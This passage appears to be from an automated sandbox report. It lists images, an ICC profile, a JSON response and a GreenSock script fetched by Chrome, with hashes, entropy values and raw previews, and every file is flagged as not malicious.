                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JSON data
                                              Category:downloaded
                                              Size (bytes):3
                                              Entropy (8bit):1.584962500721156
                                              Encrypted:false
                                              SSDEEP:3:P:P
                                              MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                              SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                              SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                              SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
                                              Preview:{}.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 738 x 512, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):32300
                                              Entropy (8bit):7.964108438343613
                                              Encrypted:false
                                              SSDEEP:768:rkjt2I4EziFAh2HOgfl+4+ZqKPX4sJTJ1Ua0cNsDPUeR:YJ21giBHFl+4rKPX4sVrYUeR
                                              MD5:A137FF38404DB2DE58F9F2D9699B420A
                                              SHA1:3417B7CDC5EBC8E782C8CC6C06007283F01DE41E
                                              SHA-256:E842D45FF11BCC6433704F07F1799887F15187F6FCA1B01ECA2383845DB65894
                                              SHA-512:053BAC6A5F5305EC7D42DC294505EEC13A07DD1A93F3132CFDA42357A6242EE146A2DC28B75CAA0542E15254AF90727590CE8F3B2AE101030286E5169EA19491
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR....................PLTELiq.;i.:h.?i.5i.9i.9g :f.:k.9i.;l.:j.<i.<j.#4....7a............... !$am...a........#......[cu..........o{....()2.............>AL.../06...JQ_...\>8....9y..j@8?o..~.tOF^]b1-._U&N..../a........4zG)$..2..S..b_..uk....1j.L..$%...W....tRNS.:0K....$...FB..[................................]....pHYs............... .IDATx...w...{..6.]c...v....e.(...9Yn..4I....9cJ....[ne..N.?.y55...].}..G.}..G.}..G.}..G......_.}.q........y#...s.Z.x[.....B......._.=7.Y...w(}.!.x1......}......O~K5..?}.q.8.H.....!}.s.V.xS!!....>yw...>.....y^.O .....(!e.. ?...OOx....U>q!}&....W.x.G...9.O....\..>........$h..../...q.8O...0.!...>.........#...#...30....G..#.D...?....i"E<..i2+'i6.}.x........'.qU.....~w.e.k...?%.....z......oG.) /H....>....j..?9.=.}T.....!....'.q...=.}..N..U!......fU..B....=.}l.n.~.g..O.U)..#.GE...O.~V#...!?vn<E<%.G....B3.RK..Y.........9.....V.B.....i....)...[.-at..v..z.?.d.)4\......-C......H?.T......W#.IE.iT\E...*....4..z./(.....{.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):16742
                                              Entropy (8bit):7.978474618470364
                                              Encrypted:false
                                              SSDEEP:384:niwSNkcDDRyIFpQZOty/n1l0gnz1pJNBdd4g:iJKcfRypOtyvLxpddd5
                                              MD5:9AE6028EBBE2D03C3861094288639F14
                                              SHA1:73F35DCDDDF1C2B0D679599F45837A68EBA64359
                                              SHA-256:61DA8F742A1154FA26FE81C8DA52F43665D835BC69CDC721B8705C3665013C67
                                              SHA-512:CD0406C8D2826BF7B571F56E51C961DAB7EB0FBA5CE042243903437FC3B7DB1BD06F1B0A82435406B3C3FA52848FC5D605132C6F4BCBF6F3024C4D906CB6C1BA
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF^A..WEBPVP8LRA../..?......Th.fd..=t._..BQ$I../.....jp..%..$5"....t`.......?.$M..3......a..~..k0........b.....P..P...m.i.%=.SJ..=)..U.Y._f.g..G..Q....&.YN#|R...x.-km.....7.ZbL.&Q..Z{.......<<....C.m.nD.i.T.....u})..:.N..d]."|.K.^...2I.i...{..k.{q._..:.R..{2.....hVui.7.....5..$r3kV.>=.GW..7A.......k...@{9..X...Z.....4..2Og...v..m;...4..H..^...k..y.ou.PW.=..%>f0.I..'..i._.0.O$.[...%.{"....to...-.s1u-.R.862..oh..T.]{.2...6...fh..^.:.^...6'...H..t.....v&.......F.0...Rd%.Z..n.~8.E.5..u...q.!.6..r....B..Z..].0&.....@.;.wt. .. M...{@...\...w..s9..*4W.o....../.<..vZ..}?.p..=.-2.m.1a9....@E.)*n.../q:...N;H.........e*(.$............\.K...E.Pq-......\*..W.kS...A...ST...H.2.....X..AE)e,m:\w........2...T......rm...i..6..2....o<$'..~..LD).)...am...1.........mww.w.....G...H....B..,.f...*.OQq+>D.'.........g..O..hmG;....7..m...H..V+...Z....s.....c...\.yE.i.Z..G..d..s..l.._WrO.orZ..R....v..].. .D'6..,iB..@*...@.a......A4...`...>..J..J...0.Rw..Q"MS
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):71512
                                              Entropy (8bit):7.996885481855253
                                              Encrypted:true
                                              SSDEEP:1536:LfKmPWy4jGj0L5X95+n45/t1TwhZzgOIo8hsrW6voI8+3/DorqpI7:zKmP86w3ZNPQZzgObhoIf7orqq7
                                              MD5:87A0F920488D09A118316DF7C6427345
                                              SHA1:33DB546E8805AE2176B3D854A02FBEFC2D59D30A
                                              SHA-256:B89E91FBB60406E1DC395A6E22E4533C3E5E8BF26E74A06BDEBB6DDAB4D4F0D7
                                              SHA-512:E02F25B08AA828343BC47AAFC4A53DD6D61C69DD1665B4EE0F12F21631CDBD692D6EAD78775BF7DF9E9E502A0DBDC357647957C1254CCC6348710AB5F3915201
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFP...WEBPVP8X..............VP8 ....p....*....>.n.R.&73.6....gn.....S.:......sk.7..D....U..<f|.Y...7.......X.+....`.6...._.7....<_..G..F...=.4..M0....4..v....s..../..s>..G...v..-.?..W..].;U....A...y.E......>......PN.J.yCxR.........d...OV..%..c. ...4..j.....W..F (Y..-...;p*l..D...~9.0dQ%'.~.."pf<...u..t...?.7Q.b..$..b.*..J...S....F#P....)$H..~.B...N.2f.=.>e.....]v..6. ..]{h>.....Y.....m...7......G1.T..W=K'..%t..>q.-.7l.B....D.=..........=Bi......+5.#.......Y..Y.....a...._Q.}...w.C...!.........Y...&.*....$}f.'...k..+..&.0G...O..8S...a.R.....h[G.c.W..[....,$o..Z...{.m*.W.p......\.....3...P..4E....r.....<.E&..p.L...@.u:W)..!..Zf.N.....\..h:~....#.,..H.5.>.....YM^~..mhB6.'...9z...-7.<.W}<...i..6zh..."._......_..peL..*..&...j......2.7..(.`Ao.A.\Wv.i;.........h8..:..N\3..W.....(....y...w.8r.".....b._....V..w...y...%&...3.....8.u._.....CZ... .B.....n.v.}F....0..v..@.EH?8..Kp.X..5\A..5...bW....w....D..T..?$.."...=h=....`.n.;8]-..2S&
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):38794
                                              Entropy (8bit):7.995088016296909
                                              Encrypted:true
                                              SSDEEP:768:4g+atA413jHA/xq/CQIrBvqX7HeSGSp86G7vpRFG3nIRwnY0l:/+atA4tAZjQ8xSAvFyCwn
                                              MD5:727F41D43EF0BB64720BE6682D24F443
                                              SHA1:F8ABE070C14B2FC2BD5B1102BEEB700730567082
                                              SHA-256:E1938D0E7762704E8D69EE8633BC0B3EBBFCA67A71D20DAE4F110BA2BCEFAC79
                                              SHA-512:F94959C3950AC3318E6508B781258EC82408736BB4F0B7A1054C440AAFB1A7B13ADC406162C27AC2F5818AD58661660478A1DA821098F630943EE439231DCC5B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://i.ytimg.com/vi_webp/erCmtRLIjD8/sddefault.webp
                                              Preview:RIFF....WEBPVP8 v........*....>m2.G.".#..:...cK.r`yw.8.8g......?..o.~.G...)}..o5.{.......~.....~.z..........P............P.....+................K.?..?.......$...'..B..~=.?.Oj.....S.....>.~A.......w.....c.-........#............<..[.w...7._.|+.w.......O...=.?............?.....{s...c.............&(Q..51o$..5..-.F..xg.....5......B...=,.,.1r.V.O.V..=zm......9.M.1.]+l<Uk]@......9..0C..k........F_)...m...OC.5..L[."...]..{.8..Pz.y?+.;)....P-U.'9D..@d"...PCA...,.m.~e...`...bx..9....f.\f...).z."B...(\..@......|k%.5e...=a..9.h...f...Y.Oa_.p.V...!..7VS.s.'. ..{........B...o|2.....y...47w.t..-...4...@..Rr.'..]....H...?.m<<o.D......I.Mm.oS}....f.KI. ../,..K...iq....S@]..tSxrg..[.g......]X.... l......%..6.^....oGe..~..U.}.2./X.q. ..9GA,...N..o...Q........u.3e"k.:..f)#M...<.r..Wj3m}..C5))...k.2.'.w=.Y..C}E..#.X........x.J."D.v.5.. .\..5.l.RI....2....5`.Sqa.G..o.bSs...c..oc..p.g.st.....hhqW..q......99h.?.'..t^^..u.).HO.s.P.8.'($i...A.....)..M.N5..s/(Dc..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):11320
                                              Entropy (8bit):7.51971613768901
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKww+qLSaiTSGUPc5V8jcdnNna4Fn29CPJBxqw9KGD/3:4YNg7wPSxV8j+n9HaxGz3
                                              MD5:8BBA6D6CE4EFF0A9885D1DABF062FE46
                                              SHA1:0A636D453D273F39D1C9B7082E710F92250DB9E2
                                              SHA-256:BE07C2E48DCEE8A171DFB79E6CEC31B979660F69C1C2CDED2C39AC6F4A60FB12
                                              SHA-512:21CD829A765733FDE67DAB0A0F96996668DF525760D2EAF57DC44F6A4985457425161CF3A36E80AC13ACE496C458119CEBEFBEA3DADE0F61DD23F7B464D7C101
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/22/c91c7fd24a8cce6c593a92dd34abb71f.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):13645
                                              Entropy (8bit):7.63563009388887
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwUOiItTBx5uuaDspe905ZklB4b6gn7AYf3z9kxn51hlSUPfuD9u:4YNg7UgT5tB15Za4dkQ3z9kxb6Umw
                                              MD5:C56FD921D2B9F23B7AE1D2F8B3582739
                                              SHA1:3D04FAF0907D221EDA47C8D6F48D223FE6AB2F31
                                              SHA-256:01CA42FDF418879984C6EA6B7E83F31DFADA958A2F7719A10A8AF7DECEE270D7
                                              SHA-512:4A924EFCFEF0C1CCFDF4BD5EFD65D2C50602EA3767305D4A4BB1DBED5263A134A89EE8AC560B41053164D0C86D318827C04F4B2E7F27E16F5FCAE7E7D0A1C4BF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3582)
                                              Category:dropped
                                              Size (bytes):3890
                                              Entropy (8bit):5.292693512327714
                                              Encrypted:false
                                              SSDEEP:96:Dhjp3a6t/KH/QBZdpFVSZgZ/uf6vBd6FF9v6GVMi0R5qIf1Q:1fFjpO+Z2SpdAvMi4Lf1Q
                                              MD5:42B8DA51F26F0347A2C840F04EE7E72B
                                              SHA1:F0CA0BE7EFD92CD5FA83C1A65DA0A4D49F5314C6
                                              SHA-256:15A443E415F3FC7B5D9D647C98200F16A47F9EC611AD276BEC5670B169AA4F23
                                              SHA-512:94551D9C83F454761AB6AB4AD0C9E2D920C14BAD89B5450FABD176E9AFD20CF64C1E81A9DC4D563BD8075EED4375D68DD628357E7E26BC702A278C7491AB8A43
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*!. * ScrollToPlugin 3.11.1. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * Subject to the terms at https://greensock.com/standard-license or for Club GreenSock members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e=e||self).window=e.window||{})}(this,function(e){"use strict";function k(){return"undefined"!=typeof window}function l(){return u||k()&&(u=window.gsap)&&u.registerPlugin&&u}function m(e){return"string"==typeof e}function n(e){return"function"==typeof e}function o(e,t){var o="x"===t?"Width":"Height",n="scroll"+o,r="client"+o;return e===T||e===i||e===c?Math.max(i[n],c[n])-(T["inner"+o]||i[r]||c[r]):e[n]-e["offset"+o]}function p(e,t){var o="scroll"+("x"===t?"Left":"Top");return e===T&&(null!=e.pageXOffset?o="page"+t.toUpperCase()+"Offset":e=null!=i
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2347
                                              Entropy (8bit):7.887898209982117
                                              Encrypted:false
                                              SSDEEP:48:Z2Euc2k6YUEkOw+zKPCj6hDowJNwR1052mcKMN53C7lhZZNI1:V2kcDz+z406+6Nu1K/G1
                                              MD5:0CDAC319B3C9622FD9D881DCCA0E6EA3
                                              SHA1:557DCBF7B282C53393E79821757B8D099FD85C42
                                              SHA-256:591339DAF9E03733C26C8D0A613E00F709764857626A36D61D858073C29D67C0
                                              SHA-512:F05F3CA28406387535557499EB216C19D4C1CC2481CD9681DD002B648F9565A3B265F8847991420C7C585C98ABB14D1236BCE34D35FF7ED88EA04A01731249A6
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/fresha.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...cPLTE..........u.....n..~.{h....................................348...qqt......NOS.........~m........D......IDATh...b.:.E.VM..V.$.....L.......j[.b.}N@.JM..Z^.e`d4...=2........oG.. ~...3.;.I.Q.!B`..)8%........RbU |....?{P..aLl.#......a.a.....2d.....c.2..Vy.O|....o..j.1\c.....H.<.hx..Y.?..H.C....cx.a. OAH...4...1...1..c\.....o #.#.p{....X.E....gR..H....b.....K....C@\.q.z.c...O#.B.3."w........s.(X..P....4..I.\/aD ..$./.K2.ax.qI....sRT.0jTJ...<(pA........9..S....b......d8..FC8,.)wG.~=....$..<....r..I...W..JX..+a..L......S,ud."..` .. .0...s..hvJd..Hj...P...K.."...FL8.cs........7dj."....d......0WGa...^...0t..f8.cv....9.2.E..S.Q.3..<..1j#...L.R>@D.&".m$.E.8.&Z../e.s.sy% .;..:DEbx9^.K....%.t+.q2d..~...wxv...K..._. .-......=.#........!^......i....&.BA.D"...!<..){.rpR..f.30Y..[.A".}w..".8...~..2. ;..&=N(.I.S.6o.. .-'.5..2..H.~.D....b....z..F.. ))..DB$.Y.S...J.....#B0.P.e..+..o..F7g...(1..1q...h.R<..W.+..g.d.T.J....n\[......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6256
                                              Entropy (8bit):7.947153038185955
                                              Encrypted:false
                                              SSDEEP:96:b0uF+76CPUZ7mc/Ng2OfRecbaFRYk+wid3yqcHCT1fAI/E2/6RyXlvIfqQnfV:ZF+GC8Z7m63Of1s+k+wueHWY0Ypt
                                              MD5:C254C5A418EB770352398FE696480DA3
                                              SHA1:2416E78012A1D5C3CE413290481D9E6ED0083F58
                                              SHA-256:AD88A46968B5662390C18BDFF7AC28634C9051DD5C019C96801BE56E20CBDAE0
                                              SHA-512:82FDE3AAD21B18DAE6D7281AE3905521AA98214B8625CAB5683645C3A99C4D81D6110CA0D2C734040C57EE3093B82F1A1952B45A334E89C71DFCAD6610B0D482
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/brochure.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..............................kl...................................................ie..................bk...kb..............................pq......kl...................ik...................`OB.................................................pq......hc.......~..........`d..................%#................I8........|...us...T........H9...~.........CJ...........o..........}z.............48.kn........df........ge..........$"....uv...........................f.......g...><...Z^...........}............?H.WU.........ZX.......R.d........36....#.kqb;.(%.....yxP.....<..wv..~z.r...WH.-R.6....IDATh...WR...p.. .uc..f........q..0D.~.$.".Fl.Z.mFG;-5*OZ...Z6.4..F-=.jlV......jv~:.w..]..Y..........d2..`P(.[a.il$..P.../.+.........20.B."....G .8.O....".[a......fQ(...z..A...E.?....A..K.p7..OHIq..Bc&$..|..B.\....D&..V.MDZZL&....3.(..._....D."""...$.v%../.Vg.:k.%-.Ib..l..@.a..#.W..$..<
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):417402
                                              Entropy (8bit):7.998776535538604
                                              Encrypted:true
                                              SSDEEP:12288:4+qCN+NmguRTv5qNFFaZx2N7vnzL01Hwl:4g6sTv8NFFGAVPzLsHwl
                                              MD5:2A6DB2EE27FE2A128C37A7476FA76297
                                              SHA1:FC842F9BB139B445D6D3FE4BBEF44A2E29FA2E56
                                              SHA-256:7D54F2C890AC6F61DF11A61D6EEA2C465FC0F403D52F44395674136500C1A8E9
                                              SHA-512:8FB8A3ED1695D8CA0D91AD1AECF99D404B600E78A673169E8F6431DB8283E64069FE7DF2E8DEE566721A5B76C3E55E6C983D0B40ACEDBA71A0725BB8435E9609
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFr^..WEBPVP8X..............VP8 .]..0."..*....>.l.R.%...S.k...en-~......ymn.o...#...0..9.(.O..?......8..-C....E.......+...~c..}..[.......:...._..8|.-e......|.....[.....W.................>...~w.......#........Q..z........7.W..._............/.:.......W...?..@......?..........x.......?../.........GP..|Z.3............k.....?>-.k....?'./...o.......c.....?.{#...............S._..Z.........7.o.......f~..;.....Wn/K........&..0...L.2aq....\d..&..0...L.2aq.*....wy.g.......}r(.6r....P.....z.....V..?.._..{.^.G'..M.<,c..[.......;..X..?f.2..#.V...0f/ rC.4....T.R...X.......3..2|............|.XT.AW...<:......J.Ei..k.."..V.T..."..G..c.c..U.!...M......]..B...L$..W.n......U.a..U.e.u7..&Q.4..&..0...2.7.0:...\d..&..0...L.2aq.........t...Y.h......q._..1;...E}.(......M.aR=-VO....#....:.(.8..A-.....d.o...S,./..Zn._..R.G.U...3...t....K.../.e...X..v....r....J,.^..t..y.....+{..;.-g.......q...^.k..y*z.f...!u...(.b.....*...&.2Z.A.m.o..4.FQ..........J...7l.W.......P...l
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3145
                                              Entropy (8bit):7.925316456377014
                                              Encrypted:false
                                              SSDEEP:96:4Afa5bhkTuD3rrmRrZW409xVi2N7qWyKxYjm:LfWlktxdDW7DyKxYjm
                                              MD5:26866A05C5626AC567A779EADA150EDC
                                              SHA1:09D3927B905393A4EB3B2A3BEFFF3166944F4B57
                                              SHA-256:D1BA80222B0F97FBD7C52DC7DA0726DC2310901CAB9B6677D24A41E5A1C964FF
                                              SHA-512:2ECAE5E9A247F44714F2CD849820B5531C4685293079D0EF2828FB71A9624AF5D89DDA16253E688625D417FCE8C709B2891795FFB2D800D4B6C9E5367B95E0A4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/shopify.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...cPLTE.....<...\.9.....M.....F`.>..E..E..Q..9......_.G].5{.A..`..C....n..........~.........~.hm.O..X.....IDATh.Y.v.8....#qC......&v....lff.....V.<y.,).dY[.^.f......?....~2kq..S......fpY<<.....8...J...1...,..0..O@..Oi.d...PK...c?..........6..qj.&YJz-m..(..d]..d.....|.|3z.].G(...}....M.M.M....I.'......I?....62...1.V G..u.......k[..Tub.iR......X.&.... ..5..g.b..,.ueF[t..e....G...oY.Z)]..D.6..;a.d..q......%C.-. @..,..[t8.G.%..S..E.I.a.EF..k....b.o...B.t.L...C....h......|?6..}:[ ._b.BL.....d.....F.u3.2..<..(....`H.....KZ....F..J.3H9..)&.r...D'x.Q.4.:;..;x...IC.A...JJ.v..Ok..a_.!NvVD......v..+.K|*|....90.....x.H....... ......4^+u.)/ .;P,l.N.....t.....<.#....&......|... CP.l..m.4M ......r:...1..s`..xTF...(....T@')+.RJy.r.....}...........B.JX`..............T...f.....c.".B!.e..u..u8.....mF.....}@...T..Jj....]..a.......X....O..=.#...M...&&..r8?pY..].X......7....f.........p<NY.gI..'l;!.%\..+s.a.Q.).......a..}.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):12183
                                              Entropy (8bit):7.5793043783739655
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwj1RrFmeOzVfGCWAfCLLnbrwyfRVuq/d1QuFKHGRUX3Ldn:4YNg7fr8pRGZAfcF1FniXBn
                                              MD5:1C30A4A45DB86428634D8D8DB75FB649
                                              SHA1:60D8F2D60BD18204A31AF4F149A9AA49544D3248
                                              SHA-256:87F375DA1700A992916B69EF3415E7EA175566B5B906DD4E89D411A1955FD95C
                                              SHA-512:FD3DB92AA526A522A2FA4DB97DDDFE1BC0044CD9B21C6DF89938093CAFC41592AF10001E4A13E4848847E4EBDCDA5CC95646687932E6067E98073BAB8A26ED24
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/60/55932156b6fbde8f01915eb83563fde4.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components 3
                                              Category:dropped
                                              Size (bytes):61373
                                              Entropy (8bit):7.982365509234224
                                              Encrypted:false
                                              SSDEEP:1536:xTXmBrQOCpUr8eZyU4BoH+w0O7b9JKRj7FB0yM4/sE2OBMFna1e:xTXmGOCpUnkBfDO36X0yr/ssKa0
                                              MD5:27B9C0EE72AEE01877029093453B013F
                                              SHA1:A3DE0603A3A9B2891CD889BA0030849D056FFE5C
                                              SHA-256:1F91094D6A5A6F1E5BC00CC000803B70885A849C0822FD1C9A0BC6762FCBEA2F
                                              SHA-512:90468E5B7711BC3D1509ADE4134088D04FC96D64757D22AD96DC4E176DD688EC55F5F5382B12712B7E88425489364B8AD1F0C610A39BB735D32FF065B8B647AC
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF..........................................................................................................................................................."........................................_........................!..1A."Qaq.2.....#BRb...$3r........CSc...4Ts......%Ddt........5u..................................4.......................!1..AQ.."2aq.3B.......#CR..............?.....Z..z.UJ.X9Q..HoO....s.&..h~.t.se(."a;.M..w.T....a.O.Q.....^.JD.t.aS.j<.....L.8....k<.$... ..5>..X..u..L........a1..:.-.2n.O.!....*sAX...<L.Dr.....82.5?X.k....[...>2>.Y.......hKL.......:.$T.Q..i..e..?.?Z.e..z....G..$......$..d....M....J........Nx$..'.5..p...pLl.Nn..v..c..iM.+.@..."t..%C.h.9..[....M..U..../..E.b..t.-..F....R...k"..s#..x\..D...A.r4?cc.)....H.D.M.n...!E..E.H.h..E.....J...R.t.....P{..Oe.W.M.... .s..$.YS.=.@>.....4.=.r.F.%A.Q,X.7}JF...wS..".d6....."....V..v.....Z.V.......t...(........"....)...4.aN0.0.B..(.Z.E.bH..WBS.)..%:..V.A.LBV:qc
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 551 x 44, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):1530
                                              Entropy (8bit):6.911719464715939
                                              Encrypted:false
                                              SSDEEP:24:g1hGHWwjx82lY2T3T0VrEh8yJ3V8wG/+YHDRqb3h19o/yUO80NLaI:+JNn2U6vJ3l4h03loKUO807
                                              MD5:AA189B8A083CC33FE67CC459BF6BB358
                                              SHA1:C70B7ACD0D076B7ABAA973F2AA788D7518709B82
                                              SHA-256:EAA9DD099D2BEAC61845A4B03FE6C7AC3AB83B7BBFBFA91B50093C348F9B04DE
                                              SHA-512:323BDA2A7337D078E3E114CA948D29A0FADA40780CEFF837C3C11D9F24A9A0FA660ED996EB46EB39AB35BABFA7DD6A87C88979FCD527A2E27B56F9F717A2DD29
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...'...,........7....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:679059D4A39211EDA71FFDA57E7EBD11" xmpMM:DocumentID="xmp.did:679059D5A39211EDA71FFDA57E7EBD11"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:679059D2A39211EDA71FFDA57E7EBD11" stRef:documentID="xmp.did:679059D3A39211EDA71FFDA57E7EBD11"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......jIDATx....MSQ....a.6.2.u./.........(.....,.X'.N`.@..{.`..B)=.<O.r.EO..7.9=.....@..........d...E.cf.......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3134
                                              Entropy (8bit):7.932761736204711
                                              Encrypted:false
                                              SSDEEP:48:YV81iRSSGsFuUDHDVzKjN6fp429rabvBjgDv3hO8+RAeRKGphlV9D7fLDLa:YsiZSGHgyp429aDVgLZOlRKYnDXa
                                              MD5:FCB6A0EAB85B9D49850002D959F2BB7B
                                              SHA1:D17ECB5ACD09D2792ECCA15E856085BCC0AD332C
